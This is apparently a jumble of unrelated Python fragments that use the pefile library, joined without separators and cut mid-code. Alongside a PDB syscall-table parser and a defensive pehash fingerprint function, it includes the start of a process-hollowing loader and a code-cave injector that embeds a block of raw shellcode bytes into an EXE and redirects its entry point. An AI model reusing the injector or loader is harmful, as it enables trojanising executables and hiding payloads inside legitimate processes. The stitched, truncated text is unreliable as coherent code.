print "\t[+]Successfully created suspended process! PID: " + str(processinfo.dwProcessId) print print "[" + str(stepcount) + "]Reading Payload PE file" stepcount += 1 File = open(payload_exe, "rb") payload_data = File.read() File.close() payload_size = len(payload_data) print "\t[+]Payload size: " + str(payload_size) print print "[" + str(stepcount) + "]Extracting the necessary info from the payload data." stepcount += 1 payload = PE(data=payload_data) payload_ImageBase = payload.OPTIONAL_HEADER.ImageBase payload_SizeOfImage = payload.OPTIONAL_HEADER.SizeOfImage payload_SizeOfHeaders = payload.OPTIONAL_HEADER.SizeOfHeaders payload_sections = payload.sections payload_NumberOfSections = payload.FILE_HEADER.NumberOfSections payload_AddressOfEntryPoint = payload.OPTIONAL_HEADER.AddressOfEntryPoint payload.close() MEM_COMMIT = 0x1000 MEM_RESERVE = 0x2000 PAGE_READWRITE = 0x4 payload_data_pointer = windll.kernel32.VirtualAlloc( None, c_int(payload_size + 1), MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE )
addrs = [ SyscallTable(0, 0, 0), SyscallTable(0, 0, 0), ] values = [ SyscallTable(0, 0, 0), SyscallTable(0, 0, 0), ] if len(sys.argv) != 3: print("usage: %s <exe> <pdb>" % sys.argv[0], file = sys.stderr) sys.exit(1) pe = PE(sys.argv[1]) pdb = pdbparse.parse(sys.argv[2]) sects = pdb.STREAM_SECT_HDR_ORIG.sections gsyms = pdb.STREAM_GSYM omap = pdb.STREAM_OMAP_FROM_SRC omap_rev = pdb.STREAM_OMAP_TO_SRC for tbl, addr in zip(names, addrs): for sym in gsyms.globals: if not hasattr(sym, 'offset'): continue try: virt_base = sects[sym.segment - 1].VirtualAddress except IndexError: continue off = sym.offset
def __init__(self, path, filename=None): self.pe = PE(path, fast_load=True) self.path = path self.filename = filename if filename is None: self.filename = os.path.basename(path)
+ "\x04\xbb\x7e\xd8\xe2\x73\x87\x1c\x24\x52\xe8\x8e\xff\xff" + "\xff\x89\x45\x08\x68\x6c\x6c\x20\x41\x68\x33\x32\x2e\x64" + "\x68\x75\x73\x65\x72\x30\xdb\x88\x5c\x24\x0a\x89\xe6\x56" + "\xff\x55\x04\x89\xc2\x50\xbb\xa8\xa2\x4d\xbc\x87\x1c\x24" + "\x52\xe8\x5f\xff\xff\xff\x68\x72\x73\x58\x20\x68\x72\x63" + "\x68\x65\x68\x65\x73\x65\x61\x68\x75\x67\x20\x52\x68\x43" + "\x57\x2f\x42\x31\xdb\x88\x5c\x24\x12\x89\xe3\x68\x65\x72" + "\x65\x58\x68\x61\x73\x20\x48\x68\x45\x53\x20\x57\x31\xc9" + "\x88\x4c\x24\x0b\x89\xe1\x31\xd2\x6a\x10\x53\x51\x52\xff" + "\xd0\x31\xc0\x50\xff\x55\x08" ) if __name__ == "__main__": exe_file = raw_input("Enter Path To Exe File ") final_pe_file = raw_input("Enter Path To New Exe File: ") pe = PE(exe_file) OEP = pe.OPTIONAL_HEADER.AddressOfEntryPoint pe_sections = pe.get_section_by_rva(pe.OPTIONAL_HEADER.AddressOfEntryPoint) align = pe.OPTIONAL_HEADER.SectionAlignment what_left = (pe_sections.VirtualAddress + pe_sections.Misc_VirtualSize) - pe.OPTIONAL_HEADER.AddressOfEntryPoint end_rva = pe.OPTIONAL_HEADER.AddressOfEntryPoint + what_left padd = align - (end_rva % align) e_offset = pe.get_offset_from_rva(end_rva + padd) - 1 scode_size = len(sample_shell_code) + 7 if padd < scode_size: # Enough space is not available for shellcode exit() # Code can be injected scode_end_off = e_offset scode_start_off = scode_end_off - scode_size pe.OPTIONAL_HEADER.AddressOfEntryPoint = pe.get_rva_from_offset(scode_start_off)
def get_pehash(pe_file): """ Return pehash for PE file, sha1 of PE structural properties. :param pe_file: file name or instance of pefile.PE() class :rtype : string SHA1 in hexdigest format """ if isinstance(pe_file, PE): # minimize mem. usage and time of execution exe = pe_file else: exe = PE(pe_file, fast_load=True) # Image Characteristics img_chars = pack('uint:16', exe.FILE_HEADER.Characteristics) pehash_bin = img_chars[0:8] ^ img_chars[8:16] # Subsystem subsystem = pack('uint:16', exe.OPTIONAL_HEADER.Subsystem) pehash_bin.append(subsystem[0:8] ^ subsystem[8:16]) # Stack Commit Size, rounded up to a value divisible by 4096, # Windows page boundary, 8 lower bits must be discarded # in PE32+ is 8 bytes stack_commit = exe.OPTIONAL_HEADER.SizeOfStackCommit if stack_commit % 4096: stack_commit += 4096 - stack_commit % 4096 stack_commit = pack('uint:56', stack_commit >> 8) pehash_bin.append( stack_commit[:8] ^ stack_commit[8:16] ^ stack_commit[16:24] ^ stack_commit[24:32] ^ stack_commit[32:40] ^ stack_commit[40:48] ^ stack_commit[48:56]) # Heap Commit Size, rounded up to page boundary size, # 8 lower bits must be discarded # in PE32+ is 8 bytes heap_commit = exe.OPTIONAL_HEADER.SizeOfHeapCommit if heap_commit % 4096: heap_commit += 4096 - heap_commit % 4096 heap_commit = pack('uint:56', heap_commit >> 8) pehash_bin.append( heap_commit[:8] ^ heap_commit[8:16] ^ heap_commit[16:24] ^ heap_commit[24:32] ^ heap_commit[32:40] ^ heap_commit[40:48] ^ heap_commit[48:56]) # Section structural information for section in exe.sections: # Virtual Address, 9 lower bits must be discarded pehash_bin.append(pack('uint:24', section.VirtualAddress >> 9)) # Size Of Raw Data, 8 lower bits must be discarded pehash_bin.append(pack('uint:24', section.SizeOfRawData >> 8)) # Section Characteristics, 16 lower bits must be discarded sect_chars = pack('uint:16', section.Characteristics >> 16) pehash_bin.append(sect_chars[:8] ^ sect_chars[8:16]) # Kolmogorov Complexity, len(Bzip2(data))/len(data) # (0..1} ∈ R -> [0..7] ⊂ N kolmogorov = 0 if section.SizeOfRawData: kolmogorov = int(round( len(compress(section.get_data())) * 7.0 / section.SizeOfRawData)) if kolmogorov > 7: kolmogorov = 7 pehash_bin.append(pack('uint:8', kolmogorov)) assert 0 == pehash_bin.len % 8 if not isinstance(pe_file, PE): exe.close() return sha1(pehash_bin.tobytes()).hexdigest()